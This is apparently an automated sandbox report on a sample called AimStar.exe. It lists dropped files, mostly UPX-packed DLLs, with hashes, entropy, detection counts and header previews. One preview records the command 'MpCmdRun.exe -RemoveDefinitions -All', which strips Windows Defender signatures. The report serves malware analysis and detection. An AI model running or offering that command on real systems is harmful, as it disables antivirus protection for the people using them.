                                                                                                                                                                                                                                        Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. J.a.n. .. 0.1. .. 2.0.2.5. .1.6.:.1.2.:.1.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. J.a.n. .. 0.1. .. 2.0.2.5. .1.6.:.1.2.:.1.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Wed Jan 1 23:03:24 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1380
                                                                                                                                                                                                                                        Entropy (8bit):4.125646021860696
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:H5DW9UOinok9H4FwK3rZZzNwI+ycuZhNCakS6PNnqSGd:pjo0hK3rZZm1ulCa32qS2
                                                                                                                                                                                                                                        MD5:8CE64FCC4F9DE15CF1D1DFAF38F870B7
                                                                                                                                                                                                                                        SHA1:CBE4628797B755730A69FBC105A41459D183DDF2
                                                                                                                                                                                                                                        SHA-256:E218FB400D6FE89D687835CF06FD10E6D618E6793C9CD0942C38F6EE407C31D1
                                                                                                                                                                                                                                        SHA-512:A39E17073E985C8C74C8703C6D52C000A3EB03C536A7F19B06D71DDEB5625C8BC85E6FE1E607B4F0794512BFF6CFC18383A36DD269ECD7F1B6F2E495B5BCD298
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:L.....ug.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........U....c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP...................JR].?..7~.............5.......C:\Users\user\AppData\Local\Temp\RES1C05.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....(.....
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120400
                                                                                                                                                                                                                                        Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                        MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                        SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                        SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                        SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                        • Filename: DChOtFdp9T.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: user.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: HX Design.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: YgJ5inWPQO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: wp-s2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: wp-cent.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: WTvNL75dCr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        • Filename: WTvNL75dCr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51192
                                                                                                                                                                                                                                        Entropy (8bit):7.762871670400831
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
                                                                                                                                                                                                                                        MD5:E1B31198135E45800ED416BD05F8362E
                                                                                                                                                                                                                                        SHA1:3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
                                                                                                                                                                                                                                        SHA-256:43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
                                                                                                                                                                                                                                        SHA-512:6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65016
                                                                                                                                                                                                                                        Entropy (8bit):7.844438023002735
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
                                                                                                                                                                                                                                        MD5:B6262F9FBDCA0FE77E96A9EED25E312F
                                                                                                                                                                                                                                        SHA1:6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
                                                                                                                                                                                                                                        SHA-256:1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
                                                                                                                                                                                                                                        SHA-512:768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.|.4.|.4.|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):122088
                                                                                                                                                                                                                                        Entropy (8bit):7.904008472378221
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
                                                                                                                                                                                                                                        MD5:9CFB6D9624033002BC19435BAE7FF838
                                                                                                                                                                                                                                        SHA1:D5EECC3778DE943873B33C83432323E2B7C2E5C2
                                                                                                                                                                                                                                        SHA-256:41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
                                                                                                                                                                                                                                        SHA-512:DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37368
                                                                                                                                                                                                                                        Entropy (8bit):7.62885373795624
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
                                                                                                                                                                                                                                        MD5:0B214888FAC908AD036B84E5674539E2
                                                                                                                                                                                                                                        SHA1:4079B274EC8699A216C0962AFD2B5137809E9230
                                                                                                                                                                                                                                        SHA-256:A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
                                                                                                                                                                                                                                        SHA-512:AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):89592
                                                                                                                                                                                                                                        Entropy (8bit):7.901406061659478
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
                                                                                                                                                                                                                                        MD5:ADEAA96A07B7B595675D9F351BB7A10C
                                                                                                                                                                                                                                        SHA1:484A974913276D236CB0D5DB669358E215F7FCED
                                                                                                                                                                                                                                        SHA-256:3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
                                                                                                                                                                                                                                        SHA-512:5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..|...o3..}...o3..v...o3..r....3..}....4..|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29552
                                                                                                                                                                                                                                        Entropy (8bit):7.411884404531348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
                                                                                                                                                                                                                                        MD5:766820215F82330F67E248F21668F0B3
                                                                                                                                                                                                                                        SHA1:5016E869D7F65297F73807EBDAF5BA69B93D82BD
                                                                                                                                                                                                                                        SHA-256:EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
                                                                                                                                                                                                                                        SHA-512:4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46584
                                                                                                                                                                                                                                        Entropy (8bit):7.708630278879131
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
                                                                                                                                                                                                                                        MD5:65CD246A4B67CC1EAB796E2572C50295
                                                                                                                                                                                                                                        SHA1:053FA69B725F1789C87D0EF30F3D8997D7E97E32
                                                                                                                                                                                                                                        SHA-256:4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
                                                                                                                                                                                                                                        SHA-512:C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..|^..}M..|_..}M..|T..}M..|Q..}..|^..}\..}...}...|U..}..|]..}..|]..}.>}]..}..|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61432
                                                                                                                                                                                                                                        Entropy (8bit):7.832464272741381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
                                                                                                                                                                                                                                        MD5:F018B2C125AA1ECC120F80180402B90B
                                                                                                                                                                                                                                        SHA1:CF2078A591F0F45418BAB7391C6D05275690C401
                                                                                                                                                                                                                                        SHA-256:67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
                                                                                                                                                                                                                                        SHA-512:C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):70512
                                                                                                                                                                                                                                        Entropy (8bit):7.839717554547019
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
                                                                                                                                                                                                                                        MD5:309B1A7156EBD03474B44F11BA363E89
                                                                                                                                                                                                                                        SHA1:8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
                                                                                                                                                                                                                                        SHA-256:67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
                                                                                                                                                                                                                                        SHA-512:E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1396821
                                                                                                                                                                                                                                        Entropy (8bit):5.531015514770172
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
                                                                                                                                                                                                                                        MD5:18C3F8BF07B4764D340DF1D612D28FAD
                                                                                                                                                                                                                                        SHA1:FC0E09078527C13597C37DBEA39551F72BBE9AE8
                                                                                                                                                                                                                                        SHA-256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
                                                                                                                                                                                                                                        SHA-512:135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1630488
                                                                                                                                                                                                                                        Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                        MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                        SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                        SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                        SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29968
                                                                                                                                                                                                                                        Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                        MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                        SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                        SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                        SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):227096
                                                                                                                                                                                                                                        Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                                        MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                                        SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                                        SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                                        SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1850360
                                                                                                                                                                                                                                        Entropy (8bit):7.9939340697016155
